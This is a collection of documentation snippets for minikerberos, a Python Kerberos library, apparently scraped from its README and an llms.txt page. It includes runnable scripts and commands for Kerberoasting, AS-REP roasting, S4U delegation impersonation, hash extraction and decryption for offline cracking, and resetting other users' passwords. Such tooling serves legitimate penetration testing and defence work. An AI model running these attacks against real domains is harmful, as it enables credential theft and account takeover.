### Install minikerberos from GitHub Source: https://github.com/skelsec/minikerberos/blob/main/README.md This snippet shows how to install the minikerberos library by cloning the GitHub repository and running the setup script. It's an alternative to installing via pip. ```bash git clone https://github.com/skelsec/minikerberos.git cd minikerberos python3 setup.py install ``` -------------------------------- ### Install minikerberos using pip Source: https://github.com/skelsec/minikerberos/blob/main/README.md This snippet demonstrates the standard method for installing the minikerberos library using pip. It is recommended to use a Python virtual environment for managing dependencies. ```bash pip install minikerberos --user ``` -------------------------------- ### minikerberos Command-Line Tools (Bash) Source: https://context7.com/skelsec/minikerberos/llms.txt This section lists various command-line tools provided by the minikerberos library, executable via pip installation. It covers common tasks such as obtaining TGTs and TGS tickets, performing Kerberoast and AS-REP roast attacks, executing S4U2self delegation, converting between CCACHE and Kirbi formats, and extracting hashes from CCACHE files. Examples demonstrate the usage syntax for each tool. ```bash # Get TGT and save to ccache minikerberos-getTGT "kerberos+password://DOMAIN\user:pass@dc-ip" --ccache user.ccache # Get TGS for a service minikerberos-getTGS "kerberos+password://DOMAIN\user:pass@dc-ip" "cifs/server@DOMAIN" # Kerberoast attack minikerberos-kerberoast "kerberos+password://DOMAIN\user:pass@dc-ip" DOMAIN sqlservice httpservice # AS-REP roast minikerberos-asreproast "kerberos+none://DOMAIN\user@dc-ip" DOMAIN user1 user2 # S4U2self delegation minikerberos-getS4U2self "kerberos+password://DOMAIN\MACHINE$:pass@dc-ip" "cifs/server@DOMAIN" "admin@DOMAIN" # Convert ccache to kirbi minikerberos-ccache2kirbi user.ccache /output/dir/ # Convert kirbi to ccache minikerberos-kirbi2ccache ticket.kirbi output.ccache # Extract hashes from ccache minikerberos-ccacheroast user.ccache # Edit ccache file minikerberos-ccacheedit user.ccache --list ``` -------------------------------- ### Request Service Ticket (TGS) using AIOKerberosClient Source: https://context7.com/skelsec/minikerberos/llms.txt Demonstrates how to request a Ticket Granting Service (TGS) ticket for a specific service principal using the `get_TGS` method. It requires a valid TGT and uses the `KerberosSPN` class to define the target service. The example shows requesting tickets for different services and overriding encryption types for Kerberoasting. ```python import asyncio from minikerberos.common.factory import KerberosClientFactory from minikerberos.common.spn import KerberosSPN async def get_tgs_example(): factory = KerberosClientFactory.from_url( "kerberos+password://TEST.CORP\user:Password123@192.168.1.1" ) client = factory.get_client() # Get TGT first (or it will fail if not in CCACHE) await client.get_TGT() # Create SPN for the target service # Format: service/hostname@REALM spn = KerberosSPN.from_spn("cifs/fileserver.test.corp@TEST.CORP") # Request TGS for the service tgs, enc_tgs_rep_part, session_key = await client.get_TGS(spn) print(f"Got TGS for: {enc_tgs_rep_part['sname']}") print(f"Valid until: {enc_tgs_rep_part['endtime']}") # Save to CCACHE (includes both TGT and TGS) client.ccache.to_file("tickets.ccache") # Get TGS for LDAP service ldap_spn = KerberosSPN.from_spn("ldap/dc.test.corp@TEST.CORP") tgs_ldap, _, _ = await client.get_TGS(ldap_spn) # Get TGS for HTTP service with specific port http_spn = KerberosSPN.from_spn("http/web.test.corp:8080@TEST.CORP") tgs_http, _, _ = await client.get_TGS(http_spn) # For Kerberoasting - override encryption type to get RC4 ticket tgs_roast, _, _ = await client.get_TGS(spn, override_etype=[23]) # 23 = RC4 asyncio.run(get_tgs_example()) ``` -------------------------------- ### Change User Passwords via Kerberos (Python) Source: https://context7.com/skelsec/minikerberos/llms.txt This Python snippet demonstrates how to change user passwords using the Kerberos password change protocol (kpasswd) with minikerberos. It shows authenticating with the current password, obtaining a TGT, and then changing the user's own password or another user's password if sufficient permissions are available. It utilizes `KerberosClientFactory` for client setup. ```python import asyncio from minikerberos.common.factory import KerberosClientFactory async def change_password(): # Authenticate with current password factory = KerberosClientFactory.from_url( "kerberos+password://TEST.CORP\user:OldPassword123@192.168.1.1" ) client = factory.get_client() # Get TGT first await client.get_TGT() # Change own password result = await client.change_password("NewSecurePassword456!") print(f"Password change result: {result}") # Change another user's password (requires permissions) result = await client.change_password( "ResetPassword789!", targetuser="targetuser@TEST.CORP" ) asyncio.run(change_password()) ``` -------------------------------- ### Manage Kerberos Credentials with KerberosCredential Source: https://context7.com/skelsec/minikerberos/llms.txt Illustrates the use of the `KerberosCredential` class for managing various authentication methods. This includes creating credentials using passwords, NT hashes, AES keys, certificates, and loading them from CCACHE, keytab, PFX, and kirbi files. It also shows how to retrieve encryption keys and supported encryption types. ```python from minikerberos.common.creds import KerberosCredential from minikerberos.protocol.constants import EncryptionType # Create credential with password cred = KerberosCredential() cred.username = "administrator" cred.domain = "TEST.CORP" cred.password = "SecretPassword123" # Create credential with NT hash cred_nt = KerberosCredential() cred_nt.username = "administrator" cred_nt.domain = "TEST.CORP" cred_nt.nt_hash = "921a7fece11f4d8c72432e41e40d0372" # Create credential with AES256 key cred_aes = KerberosCredential() cred_aes.username = "administrator" cred_aes.domain = "TEST.CORP" cred_aes.kerberos_key_aes_256 = "aabbccdd..." # 64 hex chars # Load from CCACHE file cred_ccache = KerberosCredential.from_ccache( "user.ccache", principal="administrator", realm="TEST.CORP" ) # Load from keytab file cred_keytab = KerberosCredential.from_keytab( "service.keytab", principal="http/webserver", realm="TEST.CORP" ) # Load from PFX certificate file cred_pfx = KerberosCredential.from_pfx_file( "user.pfx", password="certpassword", username="administrator", domain="TEST.CORP" ) # Load from kirbi file cred_kirbi = KerberosCredential.from_kirbi("ticket.kirbi") # Get encryption key for specific type key_bytes = cred.get_key_for_enctype(EncryptionType.AES256_CTS_HMAC_SHA1_96) # Get supported encryption types supported = cred.get_supported_enctypes() # Returns [18, 17, 23, ...] ``` -------------------------------- ### Handle Service Principal Names (SPN) with KerberosSPN Source: https://context7.com/skelsec/minikerberos/llms.txt Explains how to use the `KerberosSPN` class for parsing and formatting Service Principal Names (SPNs) and User Principal Names (UPNs). It covers parsing different formats, extracting components like service, username, domain, and port, and generating formatted SPN strings. ```python from minikerberos.common.spn import KerberosSPN # Parse Service Principal Name (service/host@realm format) spn = KerberosSPN.from_spn("cifs/fileserver.domain.com@DOMAIN.COM") print(f"Service: {spn.service}") # cifs print(f"Username: {spn.username}") # fileserver.domain.com print(f"Domain: {spn.domain}") # DOMAIN.COM # Parse User Principal Name (user@realm format) upn = KerberosSPN.from_upn("administrator@DOMAIN.COM") print(f"Username: {upn.username}") # administrator print(f"Domain: {upn.domain}") # DOMAIN.COM # SPN with port spn_port = KerberosSPN.from_spn("http/webserver.domain.com:8443@DOMAIN.COM") print(f"Port: {spn_port.port}") # 8443 # Get principal name list for Kerberos requests print(spn.get_principalname()) # ['cifs', 'fileserver.domain.com'] # Get formatted string print(spn.get_formatted_pname()) # cifs/fileserver.domain.com@DOMAIN.COM # Override realm when parsing spn_override = KerberosSPN.from_spn("mssql/sqlserver", override_realm="DOMAIN.COM") # Load SPNs from file spns = KerberosSPN.from_file("spn_list.txt", override_realm="DOMAIN.COM") for s in spns: print(s.get_formatted_pname()) ``` -------------------------------- ### Perform AS-REP Roasting Attack (Python) Source: https://context7.com/skelsec/minikerberos/llms.txt This snippet demonstrates how to perform an AS-REP roasting attack using the minikerberos library. It targets accounts with disabled pre-authentication to extract encrypted TGT portions for offline cracking. Dependencies include `asyncio` and `minikerberos.security.asreproast`. The function takes a Kerberos target, a list of usernames, and the domain as input, returning username, hash results, or errors. ```python import asyncio from minikerberos.common.target import KerberosTarget from minikerberos.security import asreproast async def asreproast_attack(): # Target KDC target = KerberosTarget("192.168.1.1") # Users to check for disabled pre-auth users = ["serviceaccount", "olduser", "testuser"] domain = "TEST.CORP" # Perform AS-REP roast async for username, hash_result, error in asreproast( target, users, domain, override_etype=[23] # RC4 for crackable hash ): if error: print(f"[-] {username}: Pre-auth required or error") else: print(f"[+] {username}: Got AS-REP hash!") print(hash_result) asyncio.run(asreproast_attack()) ``` -------------------------------- ### Convert CCACHE to Kirbi files using minikerberos-ccache2kirbi Source: https://github.com/skelsec/minikerberos/blob/main/README.md This utility converts a CCACHE file into a collection of individual .kirbi files. Each .kirbi file represents a TGS ticket stored within the original CCACHE file. ```bash minikerberos-ccache2kirbi ``` -------------------------------- ### Handle Kirbi Ticket Format (Python) Source: https://context7.com/skelsec/minikerberos/llms.txt This code illustrates how to use the `Kirbi` class from minikerberos to manage tickets in the .kirbi format, commonly used by mimikatz and Rubeus. It covers loading Kirbi tickets from files and base64 strings, extracting ticket information, converting to string representations, saving to files, and creating Kirbi objects from ticket data. It also shows conversion to and from the CCACHE format. ```python from minikerberos.common.kirbi import Kirbi from minikerberos.common.ccache import CCACHE # Load Kirbi from file kirbi = Kirbi.from_file("ticket.kirbi") # Get ticket information print(f"Username: {kirbi.get_username()}") # Convert Kirbi to string representation print(str(kirbi)) # Load from base64 (Rubeus output format) kirbi_b64 = Kirbi.from_b64("doIFgj...") # Save to file kirbi.to_file("output.kirbi") # Create Kirbi from TGT/TGS data (after getting tickets) # kirbi = Kirbi.from_ticketdata(tgs, enc_tgs_rep_part) # Convert between formats ccache = CCACHE.from_kirbi(kirbi) ccache.to_file("converted.ccache") ``` -------------------------------- ### Perform S4U2self and S4U2proxy Delegation Attacks with Python Source: https://context7.com/skelsec/minikerberos/llms.txt Demonstrates how to execute S4U2self and S4U2proxy delegation attacks using the minikerberos library. This involves obtaining tickets on behalf of a user to oneself (S4U2self) and then using that ticket to access another service (S4U2proxy). It utilizes machine account credentials and requires proper Kerberos configuration for delegation. ```python import asyncio from minikerberos.common.factory import KerberosClientFactory from minikerberos.common.spn import KerberosSPN async def delegation_attack(): # Use machine account credentials factory = KerberosClientFactory.from_url( "kerberos+password://TEST.CORP\MACHINE$:MachinePassword@192.168.1.1" ) client = factory.get_client() # Get TGT for machine account await client.get_TGT() # Target user to impersonate target_user = KerberosSPN.from_upn("administrator@TEST.CORP") # S4U2self - get ticket as administrator to this machine tgs_self, enc_part, key = await client.S4U2self(target_user) print(f"Got S4U2self ticket for: {target_user}") # S4U2self with custom SPN (impersonate to different service name) tgs_self2, _, _ = await client.S4U2self( target_user, spn_user=["cifs", "machine.test.corp"] ) # S4U2proxy - use S4U2self ticket to access another service # Requires RBCD or constrained delegation configured target_service = KerberosSPN.from_spn("cifs/fileserver.test.corp@TEST.CORP") tgs_proxy, enc_proxy, key_proxy = await client.S4U2proxy( tgs_self['ticket'], # Use ticket from S4U2self target_service ) print(f"Got S4U2proxy ticket for: {target_service}") # Combined getST - does both S4U2self and S4U2proxy tgs_final, enc_final, key_final = await client.getST(target_user, target_service) # Save impersonation ticket client.ccache.to_file("impersonated.ccache") asyncio.run(delegation_attack()) ``` -------------------------------- ### Convert Kirbi files to CCACHE using minikerberos-kirbi2ccache Source: https://github.com/skelsec/minikerberos/blob/main/README.md The minikerberos-kirbi2ccache tool merges one or more .kirbi files into a single CCACHE file. This is useful for consolidating Kerberos tickets. ```bash minikerberos-kirbi2ccache [ ...] ``` -------------------------------- ### Create Kerberos Clients with URL - minikerberos Source: https://context7.com/skelsec/minikerberos/llms.txt The KerberosClientFactory allows creating Kerberos clients by parsing a URL string. It supports various authentication methods like password, NT hash, AES keys, CCACHE files, PFX certificates, and no pre-authentication. It can also configure SOCKS5 proxy settings and return either asynchronous or blocking client instances. ```python import asyncio from minikerberos.common.factory import KerberosClientFactory # Password authentication url = "kerberos+password://DOMAIN.COM\username:SecretPassword@dc.domain.com" factory = KerberosClientFactory.from_url(url) client = factory.get_client() # Returns AIOKerberosClient # NT hash authentication url = "kerberos+nt://DOMAIN.COM\username:921a7fece11f4d8c72432e41e40d0372@192.168.1.1" factory = KerberosClientFactory.from_url(url) # AES256 key authentication url = "kerberos+aes://DOMAIN.COM\username:aes256hexkey@192.168.1.1" factory = KerberosClientFactory.from_url(url) # CCACHE file authentication url = "kerberos+ccache://DOMAIN.COM\username:ticket.ccache@192.168.1.1" factory = KerberosClientFactory.from_url(url) # PFX certificate authentication url = "kerberos+pfx://DOMAIN.COM\admin:certpassword@192.168.1.1/?certdata=cert.pfx" factory = KerberosClientFactory.from_url(url) # No pre-authentication (for AS-REP roasting) url = "kerberos+none://DOMAIN.COM\asrepuser@192.168.1.1" factory = KerberosClientFactory.from_url(url) # With SOCKS5 proxy url = "kerberos+password://DOMAIN.COM\user:pass@192.168.1.1/?proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080" factory = KerberosClientFactory.from_url(url) # Get blocking client instead of async blocking_client = factory.get_client_blocking() # Returns KerbrosClient ``` -------------------------------- ### Manage Kerberos CCACHE Files with Python Source: https://context7.com/skelsec/minikerberos/llms.txt Provides functionality for reading, writing, and manipulating Kerberos credential cache (CCACHE) files using the minikerberos library. It supports loading from and converting to Kirbi formats, listing tickets, extracting TGTs and TGS tickets, and exporting hashes for offline cracking. ```python from minikerberos.common.ccache import CCACHE from minikerberos.common.kirbi import Kirbi # Load CCACHE from file ccache = CCACHE.from_file("user.ccache") # List all tickets in the cache print("Tickets in cache:") for target in ccache.list_targets(): print(f" - {target}") # Get all TGTs tgts = ccache.get_all_tgt() for tgt, key_struct in tgts: print(f"TGT for: {tgt['cname']} @ {tgt['crealm']}") # Get all TGS tickets tgs_tickets = ccache.get_all_tgs() for tgs, key_struct in tgs_tickets: print(f"TGS for: {tgs['ticket']['sname']}") # Extract hashes (for offline cracking) hashes = ccache.get_hashes() for h in hashes: print(h) # Hashcat-compatible format # Convert to Kirbi files (for mimikatz compatibility) ccache.to_kirbidir("/path/to/output/") # Load from Kirbi file ccache_from_kirbi = CCACHE.from_kirbifile("ticket.kirbi") # Load all Kirbi files from directory ccache_multi = CCACHE.from_kirbidir("/path/to/kirbi/files/") # Export to different formats ccache.to_file("output.ccache") base64_ccache = ccache.to_b64() hex_ccache = ccache.to_hex() # Import from different formats ccache_b64 = CCACHE.from_b64(base64_ccache) ccache_hex = CCACHE.from_hex(hex_ccache) # Create new CCACHE and add tickets manually new_ccache = CCACHE() # new_ccache.add_tgt(as_rep, enc_as_rep_part) # new_ccache.add_tgs(tgs_rep, enc_tgs_rep_part) ``` -------------------------------- ### KerberosSPN - Service Principal Name Handling Source: https://context7.com/skelsec/minikerberos/llms.txt The `KerberosSPN` class handles parsing and formatting of Service Principal Names (SPNs) and User Principal Names (UPNs). It's used throughout the library for specifying service targets and user identities. ```APIDOC ## KerberosSPN Class ### Description Handles parsing, formatting, and manipulation of Service Principal Names (SPNs) and User Principal Names (UPNs) for Kerberos authentication. ### Method N/A (Class) ### Endpoint N/A ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Class Methods - **from_spn(spn_string, override_realm=None)**: Parses an SPN string (e.g., `service/host@REALM`). - **from_upn(upn_string, override_realm=None)**: Parses a UPN string (e.g., `user@REALM`). - **from_file(filepath, override_realm=None)**: Loads SPNs from a file, one per line. ### Instance Attributes - **service** (str): The service component of the SPN. - **username** (str): The host or user component of the SPN/UPN. - **domain** (str): The realm/domain of the SPN/UPN. - **port** (int | None): The port number if specified in the SPN. ### Instance Methods - **get_principalname()**: Returns a list of components for the principal name. - **get_formatted_pname()**: Returns the SPN/UPN as a formatted string. ### Request Example ```python from minikerberos.common.spn import KerberosSPN # Parse SPN spn = KerberosSPN.from_spn("cifs/fileserver.domain.com@DOMAIN.COM") print(spn.service) # Output: cifs print(spn.username) # Output: fileserver.domain.com print(spn.domain) # Output: DOMAIN.COM # Parse UPN upn = KerberosSPN.from_upn("administrator@DOMAIN.COM") print(upn.username) # Output: administrator # SPN with port spn_port = KerberosSPN.from_spn("http/webserver.domain.com:8443@DOMAIN.COM") print(spn_port.port) # Output: 8443 # Get formatted string print(spn.get_formatted_pname()) # Output: cifs/fileserver.domain.com@DOMAIN.COM ``` ### Response #### Success Response (200) N/A (This is a class for data handling, not an endpoint) #### Response Example N/A ``` -------------------------------- ### Impersonate users with machine account using minikerberos-getS4U2self Source: https://github.com/skelsec/minikerberos/blob/main/README.md The minikerberos-getS4U2self tool allows impersonation of other users on the same machine using machine account credentials. Machine account credentials should be in Kerberos URL format, and the target user in UserPrincipalName format. ```bash minikerberos-getS4U2self ``` -------------------------------- ### Recover NT Hash with PKINIT using minikerberos-getNTPKInit Source: https://github.com/skelsec/minikerberos/blob/main/README.md The minikerberos-getNTPKInit tool recovers the NT hash for a specified user when PKINIT (certificate-based authentication) is used. This functionality is limited to scenarios where certificate authentication is employed. ```bash minikerberos-getNTPKInit ``` -------------------------------- ### Fetch Kerberos TGT using minikerberos-getTGT Source: https://github.com/skelsec/minikerberos/blob/main/README.md The minikerberos-getTGT tool fetches a Ticket Granting Ticket (TGT) for provided Kerberos credentials. The credentials must be in a standard Kerberos URL format. ```bash minikerberos-getTGT ``` -------------------------------- ### KerberosCredential - Credential Management Source: https://context7.com/skelsec/minikerberos/llms.txt The `KerberosCredential` class manages various authentication methods including password, NT hash, AES keys, certificates, CCACHE files, and keytab files. ```APIDOC ## KerberosCredential Class ### Description Manages and represents Kerberos credentials using various authentication mechanisms such as passwords, NT hashes, encryption keys, certificates, and credential cache files. ### Method N/A (Class) ### Endpoint N/A ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Class Methods - **from_ccache(filepath, principal=None, realm=None)**: Loads credentials from a CCACHE file. - **from_keytab(filepath, principal=None, realm=None)**: Loads credentials from a keytab file. - **from_pfx_file(filepath, password, username=None, domain=None)**: Loads credentials from a PFX certificate file. - **from_kirbi(filepath)**: Loads credentials from a kirbi file. ### Instance Attributes - **username** (str): The username for authentication. - **domain** (str): The Kerberos realm or domain. - **password** (str): The user's password. - **nt_hash** (str): The NT hash of the user's password. - **kerberos_key_aes_256** (str): The AES256 key for authentication. ### Instance Methods - **get_key_for_enctype(encryption_type)**: Retrieves the encryption key for a specified encryption type. - **get_supported_enctypes()**: Returns a list of supported encryption types for the credential. ### Request Example ```python from minikerberos.common.creds import KerberosCredential from minikerberos.protocol.constants import EncryptionType # Create credential with password cred_pw = KerberosCredential() cred_pw.username = "administrator" cred_pw.domain = "TEST.CORP" cred_pw.password = "SecretPassword123" # Load from CCACHE file cred_ccache = KerberosCredential.from_ccache("user.ccache", principal="administrator", realm="TEST.CORP") # Get AES256 key key_bytes = cred_pw.get_key_for_enctype(EncryptionType.AES256_CTS_HMAC_SHA1_96) # Get supported encryption types supported_types = cred_pw.get_supported_enctypes() # Returns list of ints like [18, 17, 23] ``` ### Response #### Success Response (200) N/A (This is a class for data handling, not an endpoint) #### Response Example N/A ``` -------------------------------- ### Request Ticket Granting Ticket (TGT) - AIOKerberosClient Source: https://context7.com/skelsec/minikerberos/llms.txt The `get_TGT` method of `AIOKerberosClient` requests a Ticket Granting Ticket (TGT) from the KDC. It handles pre-authentication, encryption type selection, and stores the TGT in the client's CCACHE, reusing existing valid TGTs. It supports custom options for TGT requests, including specific KDC options, PAC requests, and preferred encryption types, and can be used for AS-REP roasting by disabling decryption. ```python import asyncio from minikerberos.common.factory import KerberosClientFactory async def get_tgt_example(): # Create client from URL factory = KerberosClientFactory.from_url( "kerberos+password://TEST.CORP\administrator:Password123@192.168.1.1" ) client = factory.get_client() # Get TGT with default options (forwardable, renewable, proxiable) await client.get_TGT() # Access the TGT data print(f"TGT obtained for: {client.kerberos_TGT['cname']}") print(f"Realm: {client.kerberos_TGT['crealm']}") print(f"Session key type: {client.kerberos_session_key.enctype}") # Save to CCACHE file client.ccache.to_file("user.ccache") # Get TGT with custom options await client.get_TGT( kdcopts=['forwardable', 'renewable'], with_pac=True, # Request PAC in ticket override_etype=[18, 17, 23] # Prefer AES256, then AES128, then RC4 ) # For AS-REP roasting (user without pre-auth required) factory_nopreauth = KerberosClientFactory.from_url( "kerberos+none://TEST.CORP\nopreauth_user@192.168.1.1" ) client_nopreauth = factory_nopreauth.get_client() await client_nopreauth.get_TGT(decrypt_tgt=False) # Don't decrypt, just get AS-REP asyncio.run(get_tgt_example()) ``` -------------------------------- ### Perform Kerberos RBCD using minikerberos-getS4U2proxy Source: https://github.com/skelsec/minikerberos/blob/main/README.md This tool enables Kerberos Resource-based Constrained Delegation (RBCD) impersonation using a machine account. The machine account must have permissions to delegate on all protocols, not just Kerberos. ```bash minikerberos-getS4U2proxy ``` -------------------------------- ### Kerberoast CCACHE file using minikerberos-ccacheroast Source: https://github.com/skelsec/minikerberos/blob/main/README.md The minikerberos-ccacheroast tool performs a Kerberoast attack on a CCACHE file, extracting 'hashes' for all TGS tickets stored within it. This provides a way to obtain ticket hashes without direct network interaction. ```bash minikerberos-ccacheroast ``` -------------------------------- ### Perform Kerberoasting for SPN Hash Extraction with Python Source: https://context7.com/skelsec/minikerberos/llms.txt Explains how to perform Kerberoasting attacks to extract service ticket hashes for offline cracking using the minikerberos library. This involves specifying target service accounts (SPNs) and domain, and optionally overriding encryption types for easier cracking. ```python import asyncio from minikerberos.common.factory import KerberosClientFactory from minikerberos.security import kerberoast async def kerberoast_attack(): # Create factory with valid domain credentials factory = KerberosClientFactory.from_url( "kerberos+password://TEST.CORP\user:Password123@192.168.1.1" ) # List of service accounts/SPNs to roast users = ["sqlservice", "httpservice", "backupservice"] domain = "TEST.CORP" # Perform kerberoast results = [] async for username, hash_result, error in kerberoast( factory, users, domain, override_etype=[23, 17, 18] # Prefer RC4 for easier cracking ): if error: print(f"[-] {username}: {error}") else: print(f"[+] {username}: Got hash!") results.append(hash_result) # Save hashes to file with open("hashes.txt", "w") as f: for h in results: f.write(h + "\n") asyncio.run(kerberoast_attack()) ``` -------------------------------- ### Fetch Kerberos TGS using minikerberos-getTGS Source: https://github.com/skelsec/minikerberos/blob/main/README.md The minikerberos-getTGS tool retrieves a Ticket Granting Service (TGSREP) ticket for given Kerberos credentials and a Service Principal Name (SPN). The SPN must be in the format 'service/hostname@FQDN'. ```bash minikerberos-getTGS ``` -------------------------------- ### Edit CCACHE file using minikerberos-ccacheedit Source: https://github.com/skelsec/minikerberos/blob/main/README.md minikerberos-ccacheedit is a command-line utility for editing CCACHE files. It allows users to list and delete credentials stored within a CCACHE file. ```bash minikerberos-ccacheedit --list minikerberos-ccacheedit --delete ``` -------------------------------- ### AIOKerberosClient.get_TGS - Request Service Ticket Source: https://context7.com/skelsec/minikerberos/llms.txt The `get_TGS` method requests a Ticket Granting Service (TGS) ticket for a specific service principal. It requires a valid TGT (obtained automatically or from CCACHE). The service is specified using the `KerberosSPN` class. ```APIDOC ## POST /get_TGS ### Description Requests a Ticket Granting Service (TGS) ticket for a specified service principal. This method requires a valid Ticket Granting Ticket (TGT) to be present or obtainable. ### Method POST ### Endpoint `/get_TGS` ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body - **spn** (KerberosSPN) - Required - The Service Principal Name for the target service. - **override_etype** (list[int]) - Optional - A list of encryption types to override the default selection, useful for specific scenarios like Kerberoasting. ### Request Example ```python # Assuming 'client' is an authenticated AIOKerberosClient instance # and 'spn' is a KerberosSPN object for the target service tgs, enc_tgs_rep_part, session_key = await client.get_TGS(spn) ``` ### Response #### Success Response (200) - **tgs** (bytes) - The TGS ticket. - **enc_tgs_rep_part** (dict) - The encrypted TGS reply part containing service information. - **session_key** (bytes) - The session key for the TGS. #### Response Example ```json { "tgs": "...binary_ticket_data...", "enc_tgs_rep_part": { "sname": "cifs/fileserver.test.corp@TEST.CORP", "endtime": "2023-10-27T10:00:00Z", "...other_fields..." }, "session_key": "...binary_session_key..." } ``` ``` -------------------------------- ### Perform Kerberoast attack using minikerberos-kerberoast Source: https://github.com/skelsec/minikerberos/blob/main/README.md This tool, also known as SPNRoast, performs a Kerberoast attack against specified users using provided Kerberos credentials. It can target one or multiple users. ```bash minikerberos-kerberoast [user1@FQDN user2@FQDN ...] ``` -------------------------------- ### Decrypt Kerberoasted Hashes using minikerberos-kerb23hashdecrypt Source: https://github.com/skelsec/minikerberos/blob/main/README.md This tool attempts to decrypt Kerberoasted hashes to recover user NT hashes. It processes a list of hashes obtained from a Kerberoast attack, requiring no passwords for decryption. ```bash minikerberos-kerb23hashdecrypt ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.